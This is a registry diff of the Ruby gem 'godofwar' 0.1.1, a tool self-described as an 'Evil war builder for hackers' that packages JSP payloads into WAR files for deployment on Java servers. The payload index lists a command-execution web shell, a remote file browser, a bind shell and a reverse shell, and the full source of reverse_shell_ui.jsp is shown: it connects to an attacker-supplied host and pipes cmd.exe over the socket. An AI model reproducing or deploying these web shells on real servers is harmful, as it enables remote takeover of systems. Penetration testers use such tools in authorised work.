godofwar 0.1.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +7 -0
- data/CODE_OF_CONDUCT.md +74 -0
- data/Gemfile +4 -0
- data/Gemfile.lock +19 -0
- data/README.md +132 -0
- data/Rakefile +2 -0
- data/bin/godofwar +77 -0
- data/godofwar.gemspec +26 -0
- data/lib/godofwar.rb +20 -0
- data/lib/godofwar/builder.rb +137 -0
- data/lib/godofwar/extensions.rb +29 -0
- data/lib/godofwar/payloads.rb +105 -0
- data/lib/godofwar/utils.rb +48 -0
- data/lib/godofwar/version.rb +3 -0
- data/payloads/bind_shell/bind_shell.jsp +60 -0
- data/payloads/cmd_get/cmd_get.jsp +28 -0
- data/payloads/filebrowser/example-css.css +50 -0
- data/payloads/filebrowser/filebrowser.jsp +1934 -0
- data/payloads/payloads_info.json +30 -0
- data/payloads/reverse_shell_ui/reverse_shell_ui.jsp +63 -0
- metadata +80 -0
@@ -0,0 +1,30 @@
|
|
1
|
+
{
|
2
|
+
"cmd_get": {
|
3
|
+
"desc" : "Command execution via web interface",
|
4
|
+
"os" : "any",
|
5
|
+
"conf" : {},
|
6
|
+
"url" : "http://host/cmd.jsp?cmd=whoami",
|
7
|
+
"ref" : ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
|
8
|
+
},
|
9
|
+
"filebrowser": {
|
10
|
+
"desc" : "Remote file browser, upload, download, unzip files and native command execution",
|
11
|
+
"os" : "any",
|
12
|
+
"conf" : {},
|
13
|
+
"url" : "http://host/filebrowser.jsp",
|
14
|
+
"ref" : ["http://www.vonloesch.de/filebrowser.html"]
|
15
|
+
},
|
16
|
+
"bind_shell": {
|
17
|
+
"desc" : "TCP bind shell",
|
18
|
+
"os" : "any",
|
19
|
+
"conf" : {"port": 4444},
|
20
|
+
"url" : "http://host/reverse-shell.jsp",
|
21
|
+
"ref" : ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
|
22
|
+
},
|
23
|
+
"reverse_shell_ui": {
|
24
|
+
"desc" : "TCP reverse shell with a UI to set LHOST and LPORT from browser.",
|
25
|
+
"os" : "windows",
|
26
|
+
"conf" : {"host": "attacker", "port": 4444},
|
27
|
+
"url" : "http://host/reverse_shell_ui.jsp",
|
28
|
+
"ref" : []
|
29
|
+
}
|
30
|
+
}
|
@@ -0,0 +1,63 @@
|
|
1
|
+
<%@page import="java.lang.*"%>
|
2
|
+
<%@page import="java.util.*"%>
|
3
|
+
<%@page import="java.io.*"%>
|
4
|
+
<%@page import="java.net.*"%>
|
5
|
+
|
6
|
+
<form method="post">
|
7
|
+
LHOST: <input type="text" name="ip" size=12 value="HOSTHOST"><br />
|
8
|
+
LPORT: <input type="text" name="port" size=12 value="PORTPORT"><br />
|
9
|
+
<input type="submit" name="Connect" value="Connect"><br />
|
10
|
+
</form>
|
11
|
+
|
12
|
+
<%
|
13
|
+
String ipAddress = request.getParameter("ip");
|
14
|
+
String ipPort = request.getParameter("port");
|
15
|
+
|
16
|
+
if(ipAddress != null && ipPort != null){
|
17
|
+
|
18
|
+
class StreamConnector extends Thread
|
19
|
+
{
|
20
|
+
InputStream is;
|
21
|
+
OutputStream os;
|
22
|
+
|
23
|
+
StreamConnector( InputStream is, OutputStream os )
|
24
|
+
{
|
25
|
+
this.is = is;
|
26
|
+
this.os = os;
|
27
|
+
}
|
28
|
+
|
29
|
+
public void run()
|
30
|
+
{
|
31
|
+
BufferedReader in = null;
|
32
|
+
BufferedWriter out = null;
|
33
|
+
try
|
34
|
+
{
|
35
|
+
in = new BufferedReader( new InputStreamReader( this.is ) );
|
36
|
+
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
|
37
|
+
char buffer[] = new char[8192];
|
38
|
+
int length;
|
39
|
+
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
|
40
|
+
{
|
41
|
+
out.write( buffer, 0, length );
|
42
|
+
out.flush();
|
43
|
+
}
|
44
|
+
} catch( Exception e ){}
|
45
|
+
try
|
46
|
+
{
|
47
|
+
if( in != null )
|
48
|
+
in.close();
|
49
|
+
if( out != null )
|
50
|
+
out.close();
|
51
|
+
} catch( Exception e ){}
|
52
|
+
}
|
53
|
+
}
|
54
|
+
|
55
|
+
try
|
56
|
+
{
|
57
|
+
Socket socket = new Socket( ipAddress,(new Integer(ipPort)).intValue());
|
58
|
+
Process process = Runtime.getRuntime().exec( "cmd.exe" );
|
59
|
+
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
|
60
|
+
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
|
61
|
+
} catch( Exception e ) {}
|
62
|
+
}
|
63
|
+
%>
|
metadata
ADDED
@@ -0,0 +1,80 @@
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
2
|
+
name: godofwar
|
3
|
+
version: !ruby/object:Gem::Version
|
4
|
+
version: 0.1.1
|
5
|
+
platform: ruby
|
6
|
+
authors:
|
7
|
+
- KINGSABRI
|
8
|
+
autorequire:
|
9
|
+
bindir: bin
|
10
|
+
cert_chain: []
|
11
|
+
date: 2019-04-05 00:00:00.000000000 Z
|
12
|
+
dependencies:
|
13
|
+
- !ruby/object:Gem::Dependency
|
14
|
+
name: rubyzip
|
15
|
+
requirement: !ruby/object:Gem::Requirement
|
16
|
+
requirements:
|
17
|
+
- - ">="
|
18
|
+
- !ruby/object:Gem::Version
|
19
|
+
version: '0'
|
20
|
+
type: :runtime
|
21
|
+
prerelease: false
|
22
|
+
version_requirements: !ruby/object:Gem::Requirement
|
23
|
+
requirements:
|
24
|
+
- - ">="
|
25
|
+
- !ruby/object:Gem::Version
|
26
|
+
version: '0'
|
27
|
+
description: Evil war builder for hackers with built-in war payloads.
|
28
|
+
email:
|
29
|
+
- king.sabri@gmail.com
|
30
|
+
executables:
|
31
|
+
- godofwar
|
32
|
+
extensions: []
|
33
|
+
extra_rdoc_files: []
|
34
|
+
files:
|
35
|
+
- CODE_OF_CONDUCT.md
|
36
|
+
- Gemfile
|
37
|
+
- Gemfile.lock
|
38
|
+
- README.md
|
39
|
+
- Rakefile
|
40
|
+
- bin/godofwar
|
41
|
+
- godofwar.gemspec
|
42
|
+
- lib/godofwar.rb
|
43
|
+
- lib/godofwar/builder.rb
|
44
|
+
- lib/godofwar/extensions.rb
|
45
|
+
- lib/godofwar/payloads.rb
|
46
|
+
- lib/godofwar/utils.rb
|
47
|
+
- lib/godofwar/version.rb
|
48
|
+
- payloads/bind_shell/bind_shell.jsp
|
49
|
+
- payloads/cmd_get/cmd_get.jsp
|
50
|
+
- payloads/filebrowser/example-css.css
|
51
|
+
- payloads/filebrowser/filebrowser.jsp
|
52
|
+
- payloads/payloads_info.json
|
53
|
+
- payloads/reverse_shell_ui/reverse_shell_ui.jsp
|
54
|
+
homepage: https://github.com/KINGSABRI/godofwar
|
55
|
+
licenses:
|
56
|
+
- MIT
|
57
|
+
metadata:
|
58
|
+
homepage_uri: https://github.com/KINGSABRI/godofwar
|
59
|
+
source_code_uri: https://github.com/KINGSABRI/godofwar
|
60
|
+
post_install_message:
|
61
|
+
rdoc_options: []
|
62
|
+
require_paths:
|
63
|
+
- lib
|
64
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
65
|
+
requirements:
|
66
|
+
- - ">="
|
67
|
+
- !ruby/object:Gem::Version
|
68
|
+
version: '0'
|
69
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
70
|
+
requirements:
|
71
|
+
- - ">="
|
72
|
+
- !ruby/object:Gem::Version
|
73
|
+
version: '0'
|
74
|
+
requirements: []
|
75
|
+
rubyforge_project:
|
76
|
+
rubygems_version: 2.7.6
|
77
|
+
signing_key:
|
78
|
+
specification_version: 4
|
79
|
+
summary: Evil war builder for hackers with built-in war payloads.
|
80
|
+
test_files: []
|